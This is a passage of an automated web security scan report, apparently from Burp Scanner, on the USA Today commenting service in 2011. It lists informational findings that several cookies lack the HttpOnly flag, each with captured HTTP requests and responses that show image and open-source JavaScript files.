The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 118
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:50 GMT
Connection: close

GIF89a.............Cx.g...E..........!.......,..........;x......J9q.)...( .!|]).J!...?4.g.7\G....o......$I...8N-*....;

16.165. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-reddit.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 271
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:50 GMT
Connection: close

GIF89a.............xxz...............iji04.^cSMML........K.m,........w.!.........................fff.........!.......,...........`'...e."Td. .p YK".hq.-..Q.S. .4....m...&..X..E.$x. .....\8.. q <&..c..
...[SNIP]...

16.166. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-slashdot.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 85
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:50 GMT
Connection: close

GIF89a...................!.......,..........&....'... .Y-./..u.%...N.T..S.1h........;

16.167. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-stumble.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 378
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:50 GMT
Connection: close

GIF89a...................Sk.....J.-g..V.U.....D..q...o..]....S...........v...........v..<.J$.-........h.[..............................................................................................
...[SNIP]...

16.168. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tumblr.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 606
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:50 GMT
Connection: close

GIF89a.............................................................}..t..k.`.\|.Yx.au._u._t.Ut.]q.Pq.Ml.Tk.Pg}Ih.Mg.Jd}Fe.GazBa.E_xI_tC^wG]r=^}E]uA[u?Zs@ZtAZq8Yy=Wq5Uv:Tn8Sl7Qk0Pr3Nh+Mm/Je8IZ6GX,Gb4
...[SNIP]...

16.169. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-tweet.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 618
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:51 GMT
Connection: close

GIF89a................[..\..^.._..?..C..E..G..H..I..J..K..L..N..P..R..T..U..V..W..X..Y..~...........3..>..E..F..a..c..d..d..i...........................................................................
...[SNIP]...

16.170. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/checkplayer.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 9330
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Nov 2010 16:08:56 GMT
Accept-Ranges: bytes
ETag: "0dca73e5f7fcb1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:33 GMT
Connection: close

/*    CheckPlayer 1.0.2 <http://checkplayer.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/m
...[SNIP]...

16.171. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/flXHR.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flXHR.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm6l3pluckcom; anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; usatprod=R1449728009; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 13417
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Nov 2010 16:08:56 GMT
Accept-Ranges: bytes
ETag: "0dca73e5f7fcb1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:29 GMT
Connection: close

/*    flXHR 1.0.3 <http://flxhr.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.p
...[SNIP]...

16.172. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/flensed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flensed.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 3823
Content-Type: application/x-javascript
Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT
Accept-Ranges: bytes
ETag: "8021d7f3917acb1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:34 GMT
Connection: close

/*    flensedCore 1.0 <http://www.flensed.com/>
   Copyright (c) 2008 Kyle Simpson, Getify Solutions, Inc.
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license
...[SNIP]...

16.173. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 3419
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Nov 2010 16:08:56 GMT
Accept-Ranges: bytes
ETag: "0dca73e5f7fcb1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:33 GMT
Connection: close

/*    jQuery.flXHRproxy 1.2.1 <http://flxhr.flensed.com/>
   Copyright (c) 2009 Kyle Simpson
   This software is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>

   Thi
...[SNIP]...

16.174. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 761
Content-Type: application/x-javascript
Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT
Accept-Ranges: bytes
ETag: "8021d7f3917acb1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:33 GMT
Connection: close

/**
* jQuery.XHR
* Copyright (c) 2008 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
* Date: 8/7/2008
*
* @projectDescription Re
...[SNIP]...

16.175. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/flXHR/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/swfobject.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 9763
Content-Type: application/x-javascript
Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT
Accept-Ranges: bytes
ETag: "8021d7f3917acb1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:34 GMT
Connection: close

/* SWFObject v2.1 <http://code.google.com/p/swfobject/>
Copyright (c) 2007-2008 Geoff Stearns, Michael Williams, and Bobby van der Sluis
This software is released under the MIT License <http://www
...[SNIP]...

16.176. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/pluckApps.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/scripts/pluckApps.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/pluckApps.js?skipCSS=true HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 185752
Content-Type: application/x-javascript
Last-Modified: Sun, 15 May 2011 08:43:23 GMT
Accept-Ranges: bytes
ETag: "80c73426dc12cc1:2af"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close

(function(window,undefined){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context);},_jQuery=window.jQuery,_$=window.$,document=window.document,rootjQuery,quickExpr=/^[^<]
...[SNIP]...

16.177. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Stats/Tracker.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449728009; path=/
SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.178. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/USAT/pluck/comments/comments.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449798794; path=/
SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; domain=usatoday.com; expires=Tue, 15-May-2012 01:19:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.179. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/USAT/pluck/pluck.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449690983; path=/
SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
anonId=ea7d33cf-ffc2-4016-bb89-ca8daec41de3; domain=usatoday.com; expires=Tue, 15-May-2012 01:19:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.180. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

usatprod=R1449728009; path=/
SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
